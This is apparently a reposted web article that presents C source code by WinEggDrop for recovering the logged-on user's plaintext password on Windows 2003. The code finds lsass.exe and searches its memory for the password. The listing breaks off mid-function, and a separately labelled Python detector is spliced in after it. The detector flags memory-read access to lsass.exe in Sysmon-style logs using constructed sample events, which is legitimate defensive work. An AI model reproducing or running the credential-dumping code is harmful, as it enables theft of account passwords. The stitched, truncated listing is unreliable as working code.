Three Clever Ways to Obtain the Logged-On User's Password on Windows 2003 (2)

Time: 2012-10-29 14:30:41  Author: 木木  Source: 系統之家

  Code:

  //********************************************************************************
  // Version: V1.0
  // Coder: WinEggDrop
  // Date Release: 12/15/2004
  // Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
  //          Used Is Pretty Unwise,But This May Be The Only Way To Review The
  //          Logon User's Password On windows 2003.
  // Test PlatForm: windows 2003
  // Compiled On: VC++ 6.0
  //********************************************************************************

  #include <windows.h>
  #include <stdio.h>
  #include <string.h>

  // The Base Memory Address To Search;The Password May Be Located Before The Address
  // Or Far More From This Address,Which Causes The Result Unreliable
  #define BaseAddress 0x002b5000

  char Password[MAX_PATH] = {0}; // Store The Found Password

  // Function ProtoType Declaration
  BOOL FindPassword(DWORD PID);
  int Search(char *Buffer,const UINT nSize);
  DWORD GetLsassPID();
  BOOL Is2003();
  // End Of Function ProtoType Declaration

  int main()
  {
      DWORD PID = 0;

      printf("windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

      if (!Is2003()) // Check Out If The Box Is 2003
      {
          printf("The Program Can Only Run On windows 2003 Platform\n");
          return -1;
      }

      PID = GetLsassPID(); // Get The Lsass.exe PID
      if (PID == 0) // Fail To Get PID If Returning Zero
      {
          return -1;
      }

      FindPassword(PID); // Find The Password From Lsass.exe Memory
      return 0;
  }
  // End main()


  // Purpose: Search The Memory & Try To Get The Password
  // Return Type: int
  // Parameters:
  //   In: char *Buffer --> The Memory Buffer To Search
  //   In: const UINT nSize --> The Size Of The Memory Buffer
  // Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
  //       Since The Password Is Near The Above Location,But It's Not Always True That
  //       We Will Find The Magic String,Or Even We Find It,The Password May Be Located
  //       At Some Other Place.We Only Look For Luck


  int Search(char *Buffer,const UINT nSize)
  {
      UINT OffSet = 0;
      UINT i = 0;
      UINT j = 0;
      UINT Count = 0;

      if (Buffer == NULL)
      {
          return -1;
      }

      for (i = 0 ; i < nSize ; i++)
      {
          /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
             Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
             The Magic String,We Have To Do It Manually And Slowly */
          if (Buffer[i] == 'L')
          {
              OffSet = 0;
              if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
              {
                  OffSet += strlen("LocalSystem") + 1;
                  if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
                  {
                      OffSet += strlen("Remote") + 1;
                      if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
                      {
                          OffSet += strlen("Procedure") + 1;
                          if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
                          {
                              i += OffSet;
                              break; // Stop Scanning Once The Magic String Is Found
                          }
                      }
                  }
              }
          }
      }

      if (i < nSize)
      {
          for (; i < nSize ; i++)
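
From the defender's side, the step this listing depends on (opening lsass.exe by PID and reading its memory) requires a handle with PROCESS_VM_READ, which process-access logging records. The following is an added example, not part of the original article or WinEggDrop's code: it flags Sysmon Event ID 10 style records in which a non-allowlisted process is granted that right on lsass.exe. The sample records, the file names in them and the allowlist are constructed, and the availability of Sysmon process-access logging on the monitored host is an assumption.

```python
"""Flag process-access records where lsass.exe is opened with memory-read rights.

Added illustration: field names follow Sysmon Event ID 10 (ProcessAccess);
every record and path below is constructed sample data.
"""
PROCESS_VM_READ = 0x0010  # access right needed to call ReadProcessMemory()
LSASS_PATH = r"c:\windows\system32\lsass.exe"

# Constructed allowlist of software expected to read lsass.exe (assumption).
ALLOWED_SOURCES = {r"c:\program files\exampleav\avscan.exe"}

# Constructed sample events, already parsed into dictionaries.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-01-01 10:00:01", "SourceImage": r"C:\Temp\pwview.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1F0FFF"},
    {"UtcTime": "2024-01-01 10:00:05", "SourceImage": r"C:\Program Files\ExampleAV\avscan.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"UtcTime": "2024-01-01 10:00:09", "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"UtcTime": "2024-01-01 10:00:12", "SourceImage": r"C:\Temp\pwview.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1F0FFF"},
    {"UtcTime": "2024-01-01 10:00:15", "SourceImage": r"C:\Temp\other.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "n/a"},
]

def reads_lsass(event):
    """True when the record grants PROCESS_VM_READ on the real lsass.exe."""
    if event.get("TargetImage", "").lower() != LSASS_PATH:
        return False
    try:
        granted = int(event.get("GrantedAccess", "0"), 16)
    except ValueError:
        return False  # malformed mask: cannot decide, leave for manual review
    return bool(granted & PROCESS_VM_READ)

def suspicious_lsass_reads(events, allowed=ALLOWED_SOURCES):
    """Return (time, source, mask) for lsass memory reads by unexpected processes."""
    hits = []
    for ev in events:
        if reads_lsass(ev) and ev.get("SourceImage", "").lower() not in allowed:
            hits.append((ev.get("UtcTime"), ev.get("SourceImage"), ev.get("GrantedAccess")))
    return hits

if __name__ == "__main__":
    for hit in suspicious_lsass_reads(SAMPLE_EVENTS):
        print(hit)
```
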











